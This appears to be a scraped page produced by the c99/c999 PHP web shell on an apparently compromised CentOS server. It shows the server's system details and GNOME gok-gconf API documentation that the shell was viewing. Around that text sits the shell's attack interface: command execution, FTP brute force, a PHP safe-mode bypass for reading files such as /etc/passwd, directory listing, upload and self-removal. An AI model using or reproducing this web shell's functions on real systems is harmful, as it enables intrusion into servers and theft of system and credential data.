!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/gtk-doc/html/gok/   drwxr-xr-x
Free 50.95 GB of 127.8 GB (39.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     gok-gok-gconf.html (11.55 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
gok-gconf

gok-gconf

gok-gconf —

Synopsis




gboolean    gok_gconf_get_int               (GConfClient *client,
                                             const gchar *key,
                                             gint *dest);
gboolean    gok_gconf_set_int               (GConfClient *client,
                                             const gchar *key,
                                             gint value);
gboolean    gok_gconf_get_bool              (GConfClient *client,
                                             const gchar *key,
                                             gboolean *dest);
gboolean    gok_gconf_set_bool              (GConfClient *client,
                                             const gchar *key,
                                             gboolean value);
gboolean    gok_gconf_get_string            (GConfClient *client,
                                             const gchar *key,
                                             gchar **dest);
gboolean    gok_gconf_set_string            (GConfClient *client,
                                             const gchar *key,
                                             const gchar *value);

Description

Details

gok_gconf_get_int ()

gboolean    gok_gconf_get_int               (GConfClient *client,
                                             const gchar *key,
                                             gint *dest);

Retrieves the requested key and stores it in the given dest. If an error occurs during retreiving the key a message is logged using gok_log_x and dest is left unchanged.

client : GConfClient to use to retreive the key.
key : GConf key to retrieve.
dest : Pointer to a gint to store the retrieved key, if successful.
Returns : TRUE if key retrieved successfully, FALSE if an error occured.

gok_gconf_set_int ()

gboolean    gok_gconf_set_int               (GConfClient *client,
                                             const gchar *key,
                                             gint value);

Stores the given (key, value) pair if it is different from what is in GConf already. If an error occurs during storing the key a message is logged using gok_log_x.

client : GConfClient to use to set the value.
key : GConf key to set.
value : gint to store.
Returns : TRUE if key stored successfully, FALSE if an error occured.

gok_gconf_get_bool ()

gboolean    gok_gconf_get_bool              (GConfClient *client,
                                             const gchar *key,
                                             gboolean *dest);

Retrieves the requested key and stores it in the given dest. If an error occurs during retreiving the key a message is logged using gok_log_x and dest is left unchanged.

client : GConfClient to use to retreive the key.
key : GConf key to retrieve.
dest : Pointer to a gboolean to store the retrieved key, if successful.
Returns : TRUE if key retrieved successfully, FALSE if an error occured.

gok_gconf_set_bool ()

gboolean    gok_gconf_set_bool              (GConfClient *client,
                                             const gchar *key,
                                             gboolean value);

Stores the given (key, value) pair if it is different from what is in GConf already. If an error occurs during storing the key a message is logged using gok_log_x.

client : GConfClient to use to set the value.
key : GConf key to set.
value : gboolean to store.
Returns : TRUE if key stored successfully, FALSE if an error occured.

gok_gconf_get_string ()

gboolean    gok_gconf_get_string            (GConfClient *client,
                                             const gchar *key,
                                             gchar **dest);

Retrieves the requested key and stores it in the given dest. If an error occurs during retreiving the key a message is logged using gok_log_x and dest is left unchanged.

NOTE: *dest needs to be freed when finished with.

client : GConfClient to use to retreive the key.
key : GConf key to retrieve.
dest : Pointer to a pointer to a gchar to store the retrieved key, if successful.
Returns : TRUE if key retrieved successfully, FALSE if an error occured.

gok_gconf_set_string ()

gboolean    gok_gconf_set_string            (GConfClient *client,
                                             const gchar *key,
                                             const gchar *value);

Stores the given (key, value) pair if it is different from what is in GConf already. If an error occurs during storing the key a message is logged using gok_log_x.

client : GConfClient to use to set the value.
key : GConf key to set.
value : gchar to store.
Returns : TRUE if key stored successfully, FALSE if an error occured.

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0122 ]--